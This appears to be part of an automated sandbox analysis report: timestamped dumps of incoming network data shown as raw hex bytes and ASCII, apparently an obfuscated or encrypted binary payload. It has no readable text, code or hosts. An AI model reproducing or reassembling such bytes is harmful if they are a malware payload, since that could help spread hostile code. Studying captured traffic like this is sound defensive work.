                                                                                                                                                                                                                                                                Data Ascii: RNOswW}gkUarpvvnxRXOswW}gkUgrpvvnxR>OswW}gkUgrpvvnxROswWTmkuPpvw#vwrKswoSaluPppvwmxzK_rwoC@oerHTPwza@{ekW|etqgxpPhwzaPMpkII'KEqmkM5vfxZwkOsWQkwmECqmk-RDvwzIOxrmuRQMtqmScVzaxZ kOs.ezmE~qmk
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2143INData Raw: 51 4d 09 74 71 6d 53 83 a7 8d 8f 88 7b 70 61 58 7c 72 6b 4f 8d 7b 60 6b eb 4d f1 74 71 6d 43 43 72 72 76 4f ae ad 9e 87 5c 52 ce 4f 73 77 57 a5 a0 92 9a 8a 7d 67 6b 55 6a 72 70 76 89 76 6e 78 e6 52 ed 4f 73 77 57 dd a0 92 9a 8a 7d 67 6b 55 73 72 70 76 89 76 6c 78 e6 52 be 4f 73 77 57 f5 a0 92 9a 8a 7d 67 6b 55 7b 72 70 76 57 b5 61 78 7a 52 2e 4f 73 77 36 f7 57 72 65 74 71 55 14 a2 8f 8d 50 58 77 7a 61 58 53 72 6b 4f 2b 89 61 6b 77 4d ad 74 71 6d 53 13 a7 8d 8f 56 b8 7a 61 78 5a 37 6b 4f 73 2e 91 65 77 6d 45 86 71 6d 6b 4d 3d a5 8f 89 57 a9 61 78 7a 52 2d 4f 73 77 36 95 79 60 65 54 4d 6d 6b 75 58 45 72 76 71 40 4e af 85 8d 4d 6f f0 77 6f 6b 4f 49 b2 8b 8e 4d 7c 75 70 72 50 36 77 7a 61 20 84 7c 64 4f 53 75 6f 6b 77 45 52 76 71 6b 51 73 a7 8d 8f 50 57 7c 61
                                                                                                                                                                                                                                                                Data Ascii: QMtqmS{paX|rkO{`kMtqmCCrrvO\ROswW}gkUjrpvvnxROswW}gkUsrpvvlxROswW}gkU{rpvWaxzR.Osw6WretqUPXwzaXSrkO+akwMtqmSVzaxZ7kOs.ewmEqmkM=WaxzR-Osw6y`eTMmkuXErvq@NMowokOIM|uprP6wza |dOSuokwERvqkQsPW|a
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2151INData Raw: 70 52 df 76 77 7a 59 16 97 8d 94 5d 26 89 7a 34 77 6d 67 54 57 6d 6b 75 48 2e 9d 89 88 6b 30 50 e9 70 6b 49 60 7a 4f 7a 75 6d 65 5c cf 6f 6b 73 4a 36 9d 89 88 5c 41 e2 7a 72 6b 77 4a 9a 90 94 57 ff 65 74 71 4d 05 75 70 72 29 88 79 1e 61 58 36 72 6b 4f 5b c9 6d 6b 71 57 7e 99 8e 92 4d 55 4e 72 70 76 4f 6a 8c 87 85 8c 67 78 73 57 74 6b 77 6d 9b 78 37 6d f7 55 5e 72 70 76 5f c5 63 78 7c 4b 98 a3 8c 88 49 4b 73 6d 65 74 49 85 87 8a 8f 8c 7c 04 77 5a 6d 78 7a 72 95 43 17 77 f3 4b 71 6f 65 74 49 bd 87 8a 8f 63 3c 67 29 62 39 69 25 52 6b 4f 8c 77 30 74 67 09 b7 e8 51 d6 6a 75 70 4a c3 9a 88 85 49 0c 78 72 6d 55 48 78 24 6b 77 4d fb 76 71 6d 53 eb 9c 8d 8f 88 7b 4d 61 58 7d 72 6b 4f 8d 7b 29 6b eb 4d fa 75 71 6d 43 cb 72 72 76 4c f6 96 9e 87 5c 52 54 4f 73 77 57
                                                                                                                                                                                                                                                                Data Ascii: pRvwzY]&z4wmgTWmkuH.k0PpkI`zOzume\oksJ6\AzrkwJWetqMupr)yaX6rkO[mkqW~MUNrpvOjgxsWtkwmx7mU^rpv_cx|KIKsmetI|wZmxzrCwKqoetIc<g)b9i%RkOw0tgQjupJIxrmUHx$kwMvqmS{MaX}rkO{)kMuqmCrrvL\RTOswW
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2167INData Raw: 77 6d 9b 78 37 6d f7 55 7a 72 70 76 5f c5 63 78 7c 48 08 e2 8c 88 49 4b 1b 6f 65 74 49 35 c6 8a 8f 8c 7c 04 77 5a 60 78 7a 72 4b d4 73 77 6f 4b 32 6d 65 74 28 f1 4b 7b 71 72 70 5e c8 78 61 7e 40 46 c6 b0 8c 51 4f d5 76 6d 65 4c 58 c0 94 8a 50 b9 70 76 77 5a 22 78 7a 72 32 b1 7d 13 6f 4b b2 6d 65 74 59 d3 69 75 76 48 7b db 88 85 47 58 63 72 6b 4f 4b 77 c2 94 88 93 69 06 71 4d 6b 75 70 72 8e 7a 13 7a fd 58 7b 73 6b 4f 8d 79 1b 6b 4f 8d c9 8b 8e 7c 79 64 64 63 43 60 e6 e6 41 b4 7b 72 6b 67 cc 75 6f 6d 4e a1 c9 8b 8e 4b 4b ef 71 72 70 4e b6 d6 9e 87 6c 61 4a 6f 63 76 6f 6b 4f d9 c9 8b 8e 7c 79 64 5d 6e 28 67 44 66 f0 e4 5a 2c 6a 4f 73 5f d1 69 77 6b 5f ee dd 92 94 53 50 33 71 76 77 42 ee d4 85 8d 7a 06 64 66 68 7d e6 f1 45 5b 70 6d 6b 4d 0d de 8f 89 4f 83 65
                                                                                                                                                                                                                                                                Data Ascii: wmx7mUzrpv_cx|HIKoetI5|wZ`xzrKswoK2met(K{qrp^xa~@FQOvmeLXPpvwZ"xzr2}oKmetYiuvH{GXcrkOKwiqMkuprzzX{skOykO|yddcC`A{rkguomNKKqrpNlaJocvokO|yd]n(gDfZ,jOs_iwk_SP3qvwBzdfh}E[pmkMOe
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2183INData Raw: 7a 72 69 67 71 75 6f 6d 5d 6d 65 56 7f 6d 04 c0 73 72 76 5c 77 7a 61 2e 52 79 69 4f 75 5f 6e 69 77 6b b5 ee 71 6d 69 5d 72 70 70 70 5d 7a 61 52 74 73 65 4f 1c ce 6c 6b 71 47 65 22 59 66 69 75 76 5a 71 74 77 7c b1 e3 7a 72 69 67 71 75 6f 6d 5d 6d 65 56 7f 6d 04 c8 73 72 76 5c 77 7a 61 2e 52 79 69 4f 75 5f 6e 69 77 6b b5 e8 71 6d 69 5d 72 70 70 70 5d 7a 61 52 74 73 65 4f 1c b6 6c 6b 71 47 65 22 59 66 69 75 76 5a 71 74 77 7c b1 e5 7a 72 69 67 71 75 6f 6d 5d 6d 65 56 7f 6d 04 b0 73 72 76 5c 77 7a 61 2e 52 79 69 4f 75 5f 6e 69 77 6b b5 ea 71 6d 69 5d 72 70 70 70 5d 7a 61 5a 74 72 04 86 70 77 69 41 77 6d 65 22 59 66 69 75 76 5a 71 74 77 7c b1 e7 7a 72 69 67 71 75 6f 6d 5d 6d 65 56 7f 6d 04 b8 73 72 76 5c 77 7a 61 2e 52 79 69 4f 75 5f 6e 69 77 6b b5 d4 71 6d 69
                                                                                                                                                                                                                                                                Data Ascii: zrigquom]meVmsrv\wza.RyiOu_niwkqmi]rppp]zaRtseOlkqGe"YfiuvZqtw|zrigquom]meVmsrv\wza.RyiOu_niwkqmi]rppp]zaRtseOlkqGe"YfiuvZqtw|zrigquom]meVmsrv\wza.RyiOu_niwkqmi]rppp]zaZtrpwiAwme"YfiuvZqtw|zrigquom]meVmsrv\wza.RyiOu_niwkqmi
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2199INData Raw: 70 73 70 3a 59 d8 61 79 7a 25 45 ed 73 76 6f 09 59 11 64 75 71 00 45 d7 70 73 70 0e 59 d8 60 79 7a f1 45 d0 72 76 6f e5 59 cf 65 75 71 f4 45 d7 70 73 70 d2 59 d8 61 69 7a dd 45 f5 73 71 69 e9 5e 11 64 22 f1 07 5e ed 74 24 f0 03 42 e2 65 2e fa f2 5e d7 77 21 ef e0 42 f5 61 22 f1 fb 5e ed 74 74 76 f4 5e 06 60 2e fa d3 5e 0b 76 21 ef c7 42 29 60 22 f1 da 5e 31 75 24 f0 b4 42 3e 64 7e 7c f0 42 33 72 21 ef a6 42 24 60 22 f1 b5 5e 3c 75 24 f0 95 42 33 64 79 7a 9c 5e ed 73 76 6f 92 42 cf 65 75 71 69 5d ea 71 73 70 79 41 d8 60 79 7a 68 5d ed 73 66 6f 4e 41 e4 61 75 71 13 5c 3c 75 73 70 ff 40 e5 60 79 7a e6 5c d0 72 76 6f f4 40 f2 64 65 71 c7 5c e6 74 73 70 b8 4f d8 61 79 7a ab 53 0b 76 76 6f 8f 4f 11 64 75 71 82 53 ea 71 63 70 8c 4f f4 65 6b 7a 40 51 c9 76 64 6f
                                                                                                                                                                                                                                                                Data Ascii: psp:Yayz%EsvoYduqEpspY`yzErvoYeuqEpspYaizEsqi^d"^t$Be.^w!Ba"^ttv^`.^v!B)`"^1u$B>d~|B3r!B$`"^<u$B3dyz^svoBeuqi]qspyA`yzh]sfoNAauq\<usp@`yz\rvo@deq\tspOayzSvvoOduqSqcpOekz@Qvdo
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2215INData Raw: 77 65 65 62 71 9a 11 d5 66 f5 72 76 77 7a 61 7b 7a 74 73 2d 73 08 6e ec 75 71 ae 76 71 65 6b 65 68 5b 56 df 77 fd 63 78 7a 72 6b 4c 73 31 6f e1 5e c1 73 f3 73 59 a0 77 70 7a 70 60 77 8d 1b cb 6c f5 69 4f 73 77 6f 68 77 6b 7d 16 71 12 6a f2 72 32 bb 74 77 72 61 68 62 5b 4d e6 73 f0 6d 6b 77 6d 65 77 71 2b 6b ff 59 b0 66 f1 75 22 aa 7a 7a 7a 6b 59 73 80 15 a2 61 ea 67 74 71 6d 6b 76 70 74 68 14 77 05 60 ff 78 16 a0 4d 73 7f 6f 7b 6f 44 43 dd 71 ea 69 75 70 72 70 75 77 3c 61 f2 53 45 6b c8 71 0b a4 69 77 65 65 62 71 9a 11 ad 66 f5 72 76 77 7a 61 7b 7a 74 73 2d 73 08 6e ec 75 e5 ae 76 71 65 6b 65 68 5b 56 df 77 fd 63 78 7a 72 6b 4c 73 31 6f e1 5e 5a 65 f3 73 cd a0 77 70 7a 70 60 77 8d 1b 9c 6c f5 69 4f 73 77 6f 68 77 6b 7d 16 71 12 6a f2 72 de bb 74 77 72 61
                                                                                                                                                                                                                                                                Data Ascii: weebqfrvwza{zts-snuqvqekeh[VwcxzrkLs1o^ssYwpzp`wliOswohwk}qjr2twrahb[Msmkwmewq+kYfu"zzzkYsagtqmkvpthw`xMso{oDCqiuprpuw<aSEkqiweebqfrvwza{zts-snuvqekeh[VwcxzrkLs1o^Zeswpzp`wliOswohwk}qjrtwra
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2231INData Raw: 7a 70 6b 5d 5b 77 6f 68 77 7f 4d 74 71 69 6b 67 58 72 70 73 77 68 49 78 7a 74 6b 5d 5b 77 6f 6c 77 7f 4d 74 71 65 6b 67 58 72 70 77 77 68 49 78 7a 70 6b 5d 5b 77 6f 68 77 7f 4d 74 71 69 6b 67 58 72 70 73 77 68 49 78 7a 74 6b 5d 5b 77 6f 6c 77 7f 4d 74 71 65 6b 67 58 72 70 77 77 68 49 78 7a 70 6b 5d 5b 77 6f 68 77 7f 4d 74 71 69 6b 67 58 72 70 73 77 68 49 78 7a 74 6b 5d 5b 77 6f 6c 77 7f 4d 74 71 65 6b 67 58 72 70 77 77 68 49 78 7a 70 6b 5d 5b 77 6f 6a 77 7f 4d 74 71 6f 6b 67 58 72 70 75 77 68 49 78 7a 73 6b 5d 5b 77 6f 6a 77 7f 4d 74 71 6f 6b 67 58 72 70 75 77 68 49 78 7a 76 6b 5d 5b 77 6f 6a 77 7f 4d 74 71 6f 6b 67 58 72 70 75 77 68 49 78 7a 76 6b 5d 5b 77 6f 6a 77 7f 4d 74 71 6f 6b 67 58 72 70 75 77 68 49 78 7a 76 6b 5d 5b 77 6f 6a 77 7f 4d 74 71 6c 6b
                                                                                                                                                                                                                                                                Data Ascii: zpk][wohwMtqikgXrpswhIxztk][wolwMtqekgXrpwwhIxzpk][wohwMtqikgXrpswhIxztk][wolwMtqekgXrpwwhIxzpk][wohwMtqikgXrpswhIxztk][wolwMtqekgXrpwwhIxzpk][wojwMtqokgXrpuwhIxzsk][wojwMtqokgXrpuwhIxzvk][wojwMtqokgXrpuwhIxzvk][wojwMtqokgXrpuwhIxzvk][wojwMtqlk
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2247INData Raw: 3c 1f 70 10 32 19 09 21 3e 41 3e 0e 3c 46 59 13 0f 28 01 1c 38 3e 6b 39 3c 18 19 13 25 49 39 2c 20 41 3e 16 16 12 00 5e 31 5e 65 25 44 5c 26 00 48 41 18 3e 2e 13 54 34 13 37 03 01 16 25 6f 33 07 1b 0f 39 35 5e 1b 30 43 18 3b 32 22 1e 03 33 49 40 6b 26 23 4e 27 5c 19 5e 2f 39 16 02 2e 00 34 31 08 3a 42 36 61 0e 10 1d 3f 2b 41 44 03 00 02 06 2b 3b 21 3f 39 33 05 40 70 1d 16 1c 27 4f 2f 41 29 15 37 40 07 06 24 09 31 06 12 14 6b 32 14 14 3a 2e 04 49 31 35 02 17 21 0a 11 23 3f 20 41 09 65 3d 1d 38 24 1c 19 41 1b 42 25 32 09 4f 4a 0b 20 3d 36 1e 6f 02 39 3e 11 0d 28 5e 2c 07 02 46 1f 25 18 4c 2a 11 12 0a 6b 26 45 42 21 5a 46 5e 36 05 26 26 2d 16 1a 07 02 32 2d 17 61 3e 0a 14 0a 29 1a 44 18 06 1d 18 30 15 19 1a 3c 3f 07 31 70 32 1a 37 10 0f 3e 41 52 16 40 30 5c
                                                                                                                                                                                                                                                                Data Ascii: <p2!>A><FY(8>k9<%I9, A>^1^e%D\&HA>.T47%o395^0C;2"3I@k&#N'\^/9.41:B6a?+AD+;!?93@p'O/A)7@$1k2:.I15!#? Ae=8$AB%2OJ =6o9>(^,F%L*k&EB!ZF^6&&-2-a>)D0<?1p27>AR@0\
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2263INData Raw: 3b 5c 57 18 04 27 2a 16 00 3c 05 40 4f 29 2e 0a 22 03 6b 29 40 32 39 33 07 27 2c 01 1a 29 22 39 38 39 06 44 06 1e 61 19 12 46 03 7f 36 3d 3b 0e 06 09 08 42 20 22 09 07 43 04 70 0e 3c 36 0b 00 29 38 06 3c 15 3d 3b 09 43 1c 03 15 09 18 6b 30 3c 25 16 12 46 30 24 36 3d 37 33 1c 23 35 0c 5a 41 3b 65 17 28 3b 09 17 14 38 15 06 30 4e 3b 36 11 16 2c 2d 45 1e 6f 22 15 3f 12 38 26 27 5e 39 1e 13 24 45 33 1f 53 2b 4b 43 6b 21 22 10 36 03 32 27 26 23 20 0a 25 1b 33 43 04 02 03 28 61 36 32 2b 31 2e 1e 3d 1c 1c 01 1d 15 02 33 19 28 10 48 1f 70 1a 02 0b 11 15 3b 38 3d 17 1f 26 29 52 41 3f 52 1b 20 35 6b 3b 46 27 07 11 42 30 00 00 3b 37 24 3e 3f 35 27 18 15 58 65 11 28 07 09 21 11 38 08 15 40 08 02 3d 10 34 06 0e 01 1b 6f 08 45 0f 55 40 30 27 53 01 09 05 1d 41 21 29 0a
                                                                                                                                                                                                                                                                Data Ascii: ;\W'*<@O)."k)@293',)"989DaF6=;B "Cp<6)8<=;Ck0<%F0$6=73#5ZA;e(;80N;6,-Eo"?8&'^9$E3S+KCk!"62'&# %3C(a62+1.=3(Hp;8=&)RA?R 5k;F'B0;7$>?5'Xe(!8@=4oEU@0'SA!)
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2279INData Raw: 72 7a 6d 4f 72 65 ee 6a 79 74 62 79 63 ed f2 7d 62 f3 59 64 f7 8f 69 70 72 7a 63 5d f2 76 67 79 f6 6c 6d 79 71 6f 79 f4 71 67 62 f7 56 78 6f 76 74 71 6c 4e 7d 70 7a 79 f6 4c 67 7a 7f 65 4b 77 72 61 70 66 64 7b 66 78 7b 6f 6e 5d f2 76 6a 6c 75 65 78 71 67 6d 68 67 f0 eb 65 64 f6 5b 63 76 74 67 79 ce 52 75 61 65 65 ec 40 60 76 67 65 68 75 60 f1 77 65 fa f8 6a fb 73 76 4a 7b 7f 67 63 7e 6d 67 66 f1 f4 77 67 f1 5f 62 71 7d 72 73 f8 e3 6e 63 47 7b 75 7d ea 52 7f e5 ed 79 6a 7e 67 f1 53 72 78 75 7d 41 7a 7b 61 6b 5c 72 72 6f 6b 65 ec 25 70 77 7f ea 3d 75 72 72 78 79 72 67 7f 79 6f 68 47 7b 72 4f 6a 76 70 66 71 71 6d 79 f4 38 7b 50 74 65 fa e0 6a fa f7 77 49 53 76 61 79 f7 ec 61 72 63 ec 27 71 76 60 f1 26 71 7d 63 70 68 f3 6a 4a 53 75 61 65 7f 6b 62 77 79 70 68
                                                                                                                                                                                                                                                                Data Ascii: rzmOrejytbyc}bYdiprzc]vgylmyqoyqgbVxovtqlN}pzyLgzeKwrapfd{fx{on]vjluexqgmhged[cvtgyRuaee@`vgehu`wejsvJ{gc~mgfwg_bq}rsncG{u}Ryj~gSrxu}Az{ak\rroke%pw=urrxyrgyohG{rOjvpfqqmy8{PtejwISvayarc'qv`&q}cphjJSuaekbwyph
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2295INData Raw: 3a 59 50 9e 2f d4 59 09 ca db e2 47 1f 29 65 ed 9c f9 91 d8 61 25 87 e9 94 4f da 4e 98 72 4c f8 07 be 9a b9 c6 0e 0e f3 f9 74 ed 21 15 e2 f1 57 ce db ab 62 26 59 e8 32 3d 88 c2 89 38 51 71 6d 7c 28 0c 05 59 86 01 83 39 0c 42 4b 29 eb a8 e5 0d 02 ea 33 3d 46 a8 5b 71 25 24 90 74 39 33 d8 40 ed 20 ed 31 4d 54 9d d6 6a 5d eb a2 02 24 d7 3e 86 00 87 fa fc 93 e7 72 10 79 d9 e1 d7 90 d6 87 13 3a 97 82 9d f9 18 c7 5c 25 92 bb e1 be 10 91 02 89 62 67 f5 cd 7a 3c 7d f8 ec df 96 1a a1 b2 f3 95 2e 2d 31 54 79 08 84 4d 4f f6 08 8f 6a 73 af fd ac bd 1a 53 00 10 40 ea 93 50 0a 18 ff a7 1b a2 db 54 ca 2d 9c 4f e5 41 f8 d4 36 2e c2 f9 47 b3 d0 86 42 08 d9 83 ba 52 0e 72 4e 99 7e b8 a9 ba 63 3a 72 1c 27 34 d2 5a e4 4b 38 1d fa 04 c7 70 54 98 78 01 25 5d 37 5e be eb df 3a
                                                                                                                                                                                                                                                                Data Ascii: :YP/YG)ea%ONrLt!Wb&Y2=8Qqm|(Y9BK)3=F[q%$t93@ 1MTj]$>ry:\%bgz<}.-1TyMOjsS@PT-OA6.GBRrN~c:r'4ZK8pTx%]7^:
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2311INData Raw: 9c 8a 8f db 1d 55 1d 9e 27 fa d8 b3 08 79 83 bf 0f 15 17 08 18 7c 8a 18 f5 d2 83 b5 1e 74 9a 38 c0 ce b0 e2 3a 1f 06 bc bb 70 eb 13 35 ad 7a 65 61 f4 d7 31 2f 68 b7 b7 7b 16 28 1d ee 5a 9d 6b 73 0d a9 89 2a ef 4b fd e5 b4 fe ce 5f a3 05 92 05 fb 1d 0a 30 ac 1c d0 92 0d f2 c9 4e 81 74 69 a0 c9 ad 3a 6c e7 4d d8 1b 69 b3 40 a9 ba e9 5d b9 99 90 a9 a1 68 13 18 a9 54 b7 ca 49 ff df 46 85 51 99 33 26 60 51 d7 bd 60 ca 0c a9 73 f1 cf e2 73 a3 41 57 bc c0 a3 87 4d 14 95 36 70 d8 47 9f 6a 94 58 e1 ba c1 80 bd 3e cc b6 0a 3f f2 ad e5 1f 51 5a 7b 1d c3 4f 8e d6 9a e8 76 08 35 9a d0 60 1a ae 80 ca 68 0a 4a 83 d7 7d 08 48 30 82 01 51 ca a4 b7 5a fb dd d2 4f 4c f1 ab 84 bc 34 cf bc e6 bc 13 57 1f ca 4c 38 bd 19 e2 fb 2d 86 83 86 c5 2b 16 36 0e c7 26 4d 29 71 52 91 c9
                                                                                                                                                                                                                                                                Data Ascii: U'y|t8:p5zea1/h{(Zks*K_0Nti:lMi@]hTIFQ3&`Q`ssAWM6pGjX>?QZ{Ov5`hJ}H0QZOL4WL8-+6&M)qR
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2327INData Raw: 26 30 20 a1 53 03 80 4b 6a 91 70 bf 41 eb 9e 5f ec 83 ea 2d 07 b6 05 9f f0 b6 9b f0 6a 2c e1 ab a9 bc 86 ec f0 3e 45 31 af b7 ca c7 0a 29 08 d0 ae 0a 27 78 17 97 4b 65 96 ae 74 7c 4e b1 8d 10 b2 2f cb 97 e4 0a c5 fa 2e 8d 3b 71 3b ba 72 51 43 25 f0 cf 27 2e e1 60 c8 b7 80 10 97 a9 78 00 6a 05 47 8a 9d 87 7d 77 14 d5 a0 16 09 66 4f 49 5f 52 6a 71 99 fd a1 33 73 44 91 6b 54 92 6c 39 a1 2b 9a 4a 10 a9 04 27 e0 e9 af bf 3c 7d 88 95 8f 31 a2 78 a0 3e 06 c6 4e ff 86 d7 ac e1 20 44 28 48 8a 5a f9 4d dc 58 49 97 45 82 da e0 03 73 fa 07 f6 46 ab 39 71 cc 18 85 dc 8e 16 ff f2 e2 81 53 c0 23 e3 fa dc 11 39 df af 3a c8 a6 fb a0 7f a2 29 36 cd 60 57 f2 fd 9a bd dd 55 ce 91 e6 23 ec 45 dd 67 4b cc 49 18 c0 6b 1b eb 54 d2 44 70 cf 65 d2 c6 9f e8 7d 79 c6 a1 38 0f 07 90
                                                                                                                                                                                                                                                                Data Ascii: &0 SKjpA_-j,>E1)'xKet|N/.;q;rQC%'.`xjG}wfOI_Rjq3sDkTl9+J'<}1x>N D(HZMXIEsF9qS#9:)6`WU#EgKIkTDpe}y8
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2343INData Raw: ec cb 28 94 74 cd 05 c5 96 7e d1 61 80 c5 7e ec 44 a7 e7 1a 01 7f 35 e3 d5 0d eb ca fb f2 27 2f 4d 51 d6 de 5e 1a 31 70 26 d5 56 33 20 74 41 07 1b 66 c9 43 fb 66 ed 7a af a0 f5 20 82 ad 26 8a 20 26 e2 a3 97 18 a3 56 33 49 df a1 c8 c7 e0 c1 90 c7 d8 e1 dd 26 b1 43 c6 1b 22 85 f9 a7 5d 03 bc c8 f3 ad 3f 18 5c db c7 a3 b7 e1 18 c3 f5 1d fa 9c a3 b8 49 6e 8b a4 5c 86 e2 86 b1 52 38 ef ab ac 73 d9 06 6e 88 e6 1c 84 e9 56 c5 2b 7a 2f b3 7a 31 67 e2 67 fa 67 99 ff 66 c1 a6 f2 1c d7 a0 f4 7b 9b 76 af 42 4b b7 33 cd 5a 39 a1 43 ec e0 82 a1 e5 65 18 43 be c8 c6 0d 7c 83 34 bd 4b 2d 4b 17 e1 8b d5 17 b6 e0 b3 ac 6f 60 f9 38 78 44 d2 c6 ee e4 7e d7 7c 44 59 fb 6d 7e bd f1 73 c2 f1 58 5e 20 1d ad 2b 61 a5 04 76 3c d1 8b 09 71 e6 15 61 18 d4 4f a0 54 6e 73 d9 ca de 45
                                                                                                                                                                                                                                                                Data Ascii: (t~a~D5'/MQ^1p&V3 tAfCfz & &V3I&C"]?\In\R8snV+z/z1gggf{vBK3Z9CeC|4K-Ko`8xD~|DYm~sX^ +av<qaOTnsE
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2359INData Raw: c6 0d e9 d1 ae 2b 23 c9 04 8a 7d 9c 1b 8d ba 42 1d c9 de ca 58 ed 03 7a da 95 72 ee a5 17 d8 37 eb cf 25 62 6d 2f db a8 23 c8 18 87 1f 32 c2 58 fd fd f6 1d 7d dc 45 34 37 8a 9a 7a 38 c6 50 b1 28 d2 73 4d 86 0d e5 5a ac 8e ed c9 1f aa 1e 1c d1 c8 3f c9 4f b6 f2 97 a9 65 ec 3b 2e aa 94 9f ea e5 1b 1c be 30 7f 6a 3e 0b 25 fc 2c 01 14 c6 23 6e e1 4c 9f 60 e2 0e 1f a2 1d 99 18 18 a2 ca 5d c8 0c b4 62 7e 01 61 68 33 b7 77 fa ac d5 3e e8 1d d0 2d 05 3e 9e 3c b2 e4 6b 36 f9 77 ec 9e 6c b8 33 33 46 49 f4 5b 4a 32 f3 67 f6 ea dd c8 f3 60 ea a2 84 c6 87 03 88 5d 05 e7 c8 9e d9 08 a4 90 a4 3b a6 94 f5 09 ef 47 9e c9 d3 95 98 4e 24 c0 d7 96 7a 93 19 4b 64 a6 d9 4d 98 ac 44 34 c7 60 21 55 92 72 11 be c3 4e 2d 1c 64 b1 f7 39 d3 a3 8c 42 f8 00 f3 c7 49 eb 63 66 6a 59 93
                                                                                                                                                                                                                                                                Data Ascii: +#}BXzr7%bm/#2X}E47z8P(sMZ?Oe;.0j>%,#nL`]b~ah3w>-><k6wl33FI[J2g`];GN$zKdMD4`!UrN-d9BIcfjY
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2375INData Raw: 92 11 75 50 7c b7 11 a9 3f 0b a6 a4 62 6a f6 63 6c cd 31 bc ce ea 53 22 19 c4 27 ab d8 b5 35 01 bb 59 8a ac 7e 3c 3f e9 8a bd 20 3b 47 96 55 0a bb 29 ed 5d 95 af 50 5b ac 52 58 ba ba b7 e2 c6 95 a9 7c 0e ac 89 39 81 cc 45 d7 52 64 e6 00 d0 b5 b6 e0 9e 1c 8a 87 49 e9 1b 5d 22 e5 56 59 f5 35 d0 b7 36 a4 73 0e 57 af e2 56 13 c5 17 74 2f 0d e2 a0 64 77 36 65 c1 ee d0 dd 76 38 3d cc f4 f9 95 03 fd 86 55 5c d4 bd 73 b7 d2 b1 78 ff 74 3c ec 6f 0a 58 a1 b7 5f c6 6d db 83 2e 04 a1 95 88 c8 f0 85 df bf 7e e6 65 31 1c a5 02 83 64 8f 7c 9f 6f 29 72 5c 36 15 f6 53 92 7f 43 27 36 78 d7 9e 2b 7c 2f f4 f2 94 4d 39 5c 4d a1 fa 73 22 d2 c7 7c d4 dc c0 4b 32 b1 6c bd 04 74 77 a9 7f 10 47 ce b2 f3 ec 96 1d 83 9e cd d5 2d b5 9c 18 89 82 98 c1 b5 b0 c1 e4 65 52 d0 6b 1d 69 20
                                                                                                                                                                                                                                                                Data Ascii: uP|?bjcl1S"'5Y~<? ;GU)]P[RX|9ERdI]"VY56sWVt/dw6ev8=U\sxt<oX_m.~e1d|o)r\6SC'6x+|/M9\Ms"|K2ltwG-eRki
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2391INData Raw: 3e fd b7 a7 c7 8c c3 c4 e4 5a 5e 4a df 04 35 2a 38 fb 08 5a 25 b9 c9 dc d8 d5 96 3e 24 23 7e e9 d9 84 41 b5 5b f0 83 15 d4 f7 5b 5a 36 77 44 08 32 7c fd c1 49 33 0b c6 cd dc b5 d5 89 63 c6 02 19 b8 b1 a2 d6 26 a6 5e 9b 4c dd dd b8 e8 fb 76 ac 46 b4 a4 00 d2 c9 d0 22 be 25 2b 51 b6 98 bc ea d9 e1 88 e4 ae bd c9 10 28 83 e4 d6 91 e3 e0 32 be 34 ab 57 96 35 be 69 75 58 fe 82 aa 96 9d 12 01 64 b2 d3 bb 1a 54 f8 28 b6 3f 4e 4f 18 c0 8b 18 a1 82 a2 35 2b b5 35 81 46 d5 0d 8d 3a f2 dc ea d0 5a 4e 90 f1 a1 7c c4 c6 4f 27 c5 46 4d 1f df 98 5a d9 48 fe f1 48 c0 dc 16 85 ba 39 d6 2b a5 03 ca 89 33 b7 9d 3b 1f f5 83 f5 9c c5 c8 3f de a2 a1 e3 0b d3 1b 38 bf 62 1d a8 bd 8a 36 d2 03 dd 27 15 9f 2a 19 d3 34 cf 0f 49 0b 84 8e 0a cf 3a f8 43 61 94 12 43 46 10 bb 09 4e 5b
                                                                                                                                                                                                                                                                Data Ascii: >Z^J5*8Z%>$#~A[[Z6wD2|I3c&^LvF"%+Q(24W5iuXdT(?NO5+5F:ZN|O'FMZHH9+3;?8b6'*4I:CaCFN[
                                                                                                                                                                                                                                                                2023-01-05 08:23:14 UTC2407INData Raw: f9 8e 82 1d b5 9a ae 88 2c 6f ba 5d ea 26 a7 40 58 8b 63 f0 71 82 3a 23 59 06 79 9f fe 93 12 b5 0a b4 1a 53 e0 49 8d 85 aa 0c 9b 7e af 98 fd a0 6c 80 99 45 0e be e8 f9 c5 3a de 16 7b 8c a6 8c df 8e 73 a4 e3 2b a6 53 35 9b c2 04 2e 82 fd 29 b5 4a 6b f6 81 6a d9 27 8d 3d c5 25 d7 70 4d 5c 76 73 f1 98 14 b5 6e 54 cf 49 5a 9a 42 f6 ab 39 22 ad a9 f4 ff 32 48 bc 45 7b f6 89 5b f1 94 d6 e2 99 68 11 be 24 61 84 a5 fd a2 ba fe b6 ec fa 28 09 ef 9b 4e 5b 5f 57 77 11 8a 1c f0 5b df 34 14 1e cf 5e 1c f2 91 c4 3f 03 07 8c 74 4e 84 f3 83 07 0d 04 24 99 75 09 39 1a 94 c1 97 91 29 0d 5f db da bf 33 dc 34 af 6a 9c 11 be 29 e4 e3 a3 63 2f e2 54 fe 64 b3 b5 3f 62 a6 88 4c 4c 94 b6 94 7c b6 af 47 16 2e 62 a6 1d b4 6b 04 43 a5 64 36 1b 66 8a ed 91 e8 84 ee 4a 66 ac d4 df 15
                                                                                                                                                                                                                                                                Data Ascii: ,o]&@Xcq:#YySI~lE:{s+S5.)Jkj'=%pM\vsnTIZB9"2HE{[h$a(N[_Ww[4^?tN$u9)_34j)c/Td?bLL|G.bkCd6fJf
